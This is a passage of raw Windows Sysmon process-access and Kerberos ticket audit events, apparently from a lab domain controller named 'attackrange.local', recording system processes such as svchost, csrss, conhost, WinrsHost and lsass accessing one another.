07:53:48.204","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2531,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2532,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2533,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-00105F7D0400}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-00105F7D0400}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2534,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F8C-5F25-0000-00105F7D0400}\r\nSourceProcessId: 4400\r\nSourceThreadId: 4420\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010DF7C0400}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F8C-5F25-0000-00105F7D0400}","SourceProcessId":"4400","SourceThreadId":"4420","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010DF7C0400}","TargetProcessId":"4388","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2535,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010DF7C0400}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010DF7C0400}","TargetProcessId":"4388","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2536,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 2244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010DF7C0400}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"2244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010DF7C0400}","TargetProcessId":"4388","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2537,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.235\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.235","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220356,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220357,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
